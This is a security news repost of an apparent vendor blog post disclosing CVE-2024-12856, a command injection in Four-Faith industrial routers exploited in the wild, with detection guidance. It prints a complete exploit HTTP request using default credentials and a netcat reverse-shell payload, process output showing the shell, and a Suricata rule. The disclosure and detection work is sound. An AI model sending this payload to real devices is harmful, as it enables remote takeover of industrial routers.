Close Menu

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Stopping Fraud at Each Stage of the Customer Journey Without Adding Friction

    April 21, 2026

    SSA-194557 V1.3 (Last Update: 2025-11-11): Improper Limitation of Filesystem Access through Web Server Vulnerability in SIPROTEC 5

    April 21, 2026

    ZDI-26-279: Microsoft Windows Snipping Tool Improper Input Validation Remote Code Execution Vulnerability

    April 21, 2026
    Facebook X (Twitter) Instagram
    • Demos
    • Technology
    • Gaming
    • Buy Now
    Facebook X (Twitter) Instagram Pinterest Vimeo
    Canadian Cyber WatchCanadian Cyber Watch
    • Home
    • News
    • Alerts
    • Tips
    • Tools
    • Industry
    • Incidents
    • Events
    • Education
    Subscribe
    Canadian Cyber WatchCanadian Cyber Watch
    Home»News»Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild | Blog
    News

    Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild | Blog

    adminBy adminApril 21, 2026No Comments3 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email



    VulnCheck observed a new post-authentication vulnerability affecting Four-Faith industrial routers being exploited in the wild. The attacker leveraged the router’s default credentials, effectively resulting in unauthenticated remote command injection. VulnCheck has assigned this issue CVE-2024-12856.

    The attack can be conducted against, at least, the Four-Faith F3x24 and F3x36 over HTTP using the /apply.cgi endpoint. Censys finds approximately 15,000 internet-facing devices. The systems are vulnerable to OS command injection in the adj_time_year parameter when modifying the device’s system time via submit_type=adjust_sys_time. The following POST request demonstrates exploitation for a reverse shell.

    POST /apply.cgi HTTP/1.1
    Host: 192.168.1.1:90
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
    Content-Length: 296
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time
    

    On the device, the result of the injection can be observed using ps:

    20938 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
    20940 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
    20942 admin     1636 S    cat WaO
    20943 admin     1636 S    /bin/sh -i
    20945 admin     1636 S    nc 192.168.1.206 1270
    

    For those that have an encyclopedic memory for exploits, this vulnerability should not be confused with CVE-2019-12168. While both flow through the apply.cgi endpoint, they attack different underlying components (CVE-2019-12168 attacks submit_type=start and has an OS injection in the ping_ip parameter).

    VulnCheck observed 178.215.238[.]91 attempting to exploit this vulnerability. Additionally, we note that this November 2024 blog also calls out exploitation of this vulnerability. Their observed User-Agent even matches the User-Agent VulnCheck observed in the wild (although we saw an entirely different payload).

    The VulnCheck Initial Access team wrote the following Suricata rule to detect CVE-2024-12856 on the wire:

    alert http any any -> any any ( \
        msg:"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt"; \
        flow:to_server; \
        http.method; content:"POST"; \
        http.uri; content:"/apply.cgi"; startswith; \
        http.header_names; content:"Authorization"; \
        http.request_body; content:"change_action="; \
        content:"adjust_sys_time"; \
        pcre:"/adj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]/"; \
        classtype:web-application-attack; \
        reference:cve,CVE-2024-12856; \
        sid:12700438; rev:1;)
    

    Finally, pursuant to our vulnerability disclosure policy for vulnerabilities exploited in the wild, we notified Four-Faith and our customers about this issue on December 20, 2024. Questions about patches, affected models, and affected firmware versions should be directed at Four-Faith.

    The VulnCheck Initial Access team is always on the lookout for new exploitation in the wild. For more research like this, see our blogs, PaperCut Exploitation, ProjectSend CVE-2024-11680 Exploited in the Wild, Fileless Remote Code Execution on Juniper Firewalls
    , and Does Confluence Dream of Shells?

    Sign up to our website today to get free access to our VulnCheck KEV and request a trial of our Initial Access Intelligence and Exploit & Vulnerability Intelligence products.



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleMicrosoft GitHub Repository Windows-driver-samples Workflow Remote Code Execution – Research Advisory
    Next Article ZDI-26-279: Microsoft Windows Snipping Tool Improper Input Validation Remote Code Execution Vulnerability
    admin
    • Website

    Related Posts

    News

    Stopping Fraud at Each Stage of the Customer Journey Without Adding Friction

    April 21, 2026
    News

    New cross domain guidance for government, industry and the wider security community

    April 21, 2026
    News

    NGate Android malware uses HandyPay NFC app to steal card data

    April 21, 2026
    Add A Comment

    Comments are closed.

    Demo
    Top Posts

    Catchy & Intriguing

    March 17, 202623 Views

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202620 Views

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews
    85
    Featured

    Pico 4 Review: Should You Actually Buy One Instead Of Quest 2?

    January 15, 2021 Featured
    8.1
    Uncategorized

    A Review of the Venus Optics Argus 18mm f/0.95 MFT APO Lens

    January 15, 2021 Uncategorized
    8.9
    Editor's Picks

    DJI Avata Review: Immersive FPV Flying For Drone Enthusiasts

    January 15, 2021 Editor's Picks

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Demo
    Most Popular

    Catchy & Intriguing

    March 17, 202623 Views

    The Grandparent Scam: How AI Voice Technology Makes This Old Con Deadlier Than Ever

    March 18, 202620 Views

    Global Takedown of Massive IoT Botnets Halts Record-Breaking Cyberattacks

    March 20, 202619 Views
    Our Picks

    Stopping Fraud at Each Stage of the Customer Journey Without Adding Friction

    April 21, 2026

    SSA-194557 V1.3 (Last Update: 2025-11-11): Improper Limitation of Filesystem Access through Web Server Vulnerability in SIPROTEC 5

    April 21, 2026

    ZDI-26-279: Microsoft Windows Snipping Tool Improper Input Validation Remote Code Execution Vulnerability

    April 21, 2026

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2026 ThemeSphere. Designed by ThemeSphere.

    Type above and press Enter to search. Press Esc to cancel.